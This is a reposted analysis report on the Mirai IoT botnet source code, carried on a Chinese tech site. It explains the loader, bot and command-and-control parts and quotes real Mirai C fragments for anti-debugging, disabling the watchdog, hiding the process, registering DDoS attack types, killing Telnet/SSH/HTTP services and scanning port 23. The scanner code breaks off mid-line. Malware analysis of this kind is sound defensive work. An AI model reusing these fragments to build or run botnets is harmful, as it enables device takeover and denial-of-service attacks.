未加星标

MiraiSourceCodeAnalysisReport

字体大小 | |
[系统(linux) 所属分类 系统(linux) | 发布者 店小二04 | 时间 2016 | 作者 红领巾 ] 0人收藏点击收藏

阅读: 2

As shown in Figure 1, there are two folders. The loader folder, as its name implies, is a loader that creates servers and monitors the status of connections.

文章目录

Function Implementation Connected Domain Names and Port Numbers User Name and Password Configuration Single_Load.c That Loads Files Wget.c That Obtains Remote Files Nogdb.c That Updates File Information Badbot.c That Displays Information of a Specified Bot Code Structure

As shown in Figure 1, there are two folders. The loader folder, as its name implies, is a loader that creates servers and monitors the status of connections. The mirai folder implements major malicious functions, including such tool implementations as establishing network connections, executingDDoS attacks, and downloading data, and operations from the main control terminal.

Code structure

Infection Path

Attackers can use an SSH or Telnet account and default passwords to compromise Internet of Things (IoT) devices.

Function Implementation

The source code reveals that the following malicious functions can be implemented:

bot folder: performs such operations as anti-debugging, hiding of its own process, configuration of initial port numbers for domain names, configuration of default weak passwords, establishment of network connections, andDDoS execution. tools folder: performs tool-based operations such as wget, file updating, and XOR operations. cnc folder: monitors the successfully infected bots from the main control terminal, parses instructions as a receiver, and launchesDDoS attacks.

When implementing functions, the code in the bot folder opens PF_INET (TCP raw socket for UNIX networks) and binds it to TCP port 48101 at the local host IP address of 127.0.0.1. Then it can listen for incoming connections. When one device on a network is infected, the infection will spread to other devices on the same network via the Telnet service.

bot Folder

In terms of functionality, the code in the bot folder can perform the following operations:

Anti-GDB debugging, CC address parsing, establishment of network connections, andDDoS execution.

static void anti_gdb_entry(int); static void resolve_cnc_addr(void); static void establish_connection(void); static void teardown_connection(void); static void ensure_single_instance(void); static BOOL unlock_tbl_if_nodebug(char *);//Anti-GDB debugging. //Parses CC addresses. //Establishes network connections. //Establishes network connections. //Ensures that only one instance is running each time (deletes the existing process when detecting a new instance running). //Initializes various tables (including the list of connected domain names and port numbers and that of user names and passwords).

If detecting GDB debugging, the program deletes its own execution file, prevents the watchdog from restarting the device, and prompts a CC address connection failure.

// Delete self unlink(args[0]); // Signal based control flow sigemptyset(&sigs); sigaddset(&sigs, SIGINT); sigprocmask(SIG_BLOCK, &sigs, NULL); signal(SIGCHLD, SIG_IGN); signal(SIGTRAP, &anti_gdb_entry); // Prevent watchdog from rebooting device if ((wfd = open("/dev/watchdog", 2)) != -1 || (wfd = open("/dev/misc/watchdog", 2)) != -1) { int one = 1; ioctl(wfd, 0x80045704, &one); close(wfd); wfd = 0; } chdir("/");

To ensure that each time only one instance is running (by connecting to the local port 48101) and kill the process corresponding to port 48101:

addr.sin_family = AF_INET; addr.sin_addr.s_addr = local_bind ? (INET_ADDR(127,0,0,1)) : LOCAL_ADDR; addr.sin_port = htons(SINGLE_INSTANCE_PORT); // Try to bind to the control port errno = 0; if (bind(fd_ctrl, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1) { if (errno == EADDRNOTAVAIL && local_bind) local_bind = FALSE; #ifdef DEBUG printf("[main] Another instance is already running (errno = %d)! Sending kill request...\r\n", errno); #endif

To hide the process:

// Hide argv0 name_buf_len = ((rand_next() % 4) + 3) * 4; rand_alphastr(name_buf, name_buf_len); name_buf[name_buf_len] = 0; util_strcpy(args[0], name_buf); // Hide process name name_buf_len = ((rand_next() % 6) + 3) * 4; rand_alphastr(name_buf, name_buf_len); name_buf[name_buf_len] = 0; prctl(PR_SET_NAME, name_buf); // Print out system exec table_unlock_val(TABLE_EXEC_SUCCESS); tbl_exec_succ = table_retrieve_val(TABLE_EXEC_SUCCESS, &tbl_exec_succ_len); write(STDOUT, tbl_exec_succ, tbl_exec_succ_len); write(STDOUT, "\n", 1); table_lock_val(TABLE_EXEC_SUCCESS);

To initialize attack type parameters and provide various attack types (UDP, VSE, DNS, SYN, and otherDDoS attack types) for attackers to choose:

BOOL attack_init(void) { int i; add_attack(ATK_VEC_UDP, (ATTACK_FUNC)attack_udp_generic); add_attack(ATK_VEC_VSE, (ATTACK_FUNC)attack_udp_vse); add_attack(ATK_VEC_DNS, (ATTACK_FUNC)attack_udp_dns); add_attack(ATK_VEC_UDP_PLAIN, (ATTACK_FUNC)attack_udp_plain); add_attack(ATK_VEC_SYN, (ATTACK_FUNC)attack_tcp_syn); add_attack(ATK_VEC_ACK, (ATTACK_FUNC)attack_tcp_ack); add_attack(ATK_VEC_STOMP, (ATTACK_FUNC)attack_tcp_stomp); add_attack(ATK_VEC_GREIP, (ATTACK_FUNC)attack_gre_ip); add_attack(ATK_VEC_GREETH, (ATTACK_FUNC)attack_gre_eth); //add_attack(ATK_VEC_PROXY, (ATTACK_FUNC)attack_app_proxy); add_attack(ATK_VEC_HTTP, (ATTACK_FUNC)attack_app_http); return TRUE; }

To initialize port settings by shutting down ports to terminate other processes that use Telnet, SSH, and HTTP services and prevent them from restarting:

// Kill telnet service and prevent it from restarting #ifdef KILLER_REBIND_TELNET #ifdef DEBUG printf("[killer] Trying to kill port 23\n"); #endif if (killer_kill_by_port(htons(23))) { #ifdef DEBUG printf("[killer] Killed tcp/23 (telnet)\n"); #endif } else { #ifdef DEBUG printf("[killer] Failed to kill port 23\n"); #endif } tmp_bind_addr.sin_port = htons(23); if ((tmp_bind_fd = socket(AF_INET, SOCK_STREAM, 0)) != -1) { bind(tmp_bind_fd, (struct sockaddr *)&tmp_bind_addr, sizeof (struct sockaddr_in)); listen(tmp_bind_fd, 1); } #ifdef DEBUG printf("[killer] Bound to tcp/23 (telnet)\n"); #endif #endif // Kill SSH service and prevent it from restarting …… // Kill HTTP service and prevent it from restarting ……

To initialize scanning parameters and scan other devices on the LAN with weak passwords and with port 23 opened:

// Set up IPv4 header iph->ihl = 5; iph->version = 4; iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr)); iph->id = rand_next(); iph->ttl = 64; iph->protocol = IPPROTO_TCP; // Set up TCP header tcph->dest = htons(23); tcph->source = source_port; tcph->doff = 5; tcph->window = rand_n

本文系统(linux)相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统

主题: FUSUUCGREUTETHPPRIPv4
分页:12
转载请注明
本文标题:MiraiSourceCodeAnalysisReport
本站链接:http://www.codesec.net/view/485554.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(linux) | 评论(0) | 阅读(187)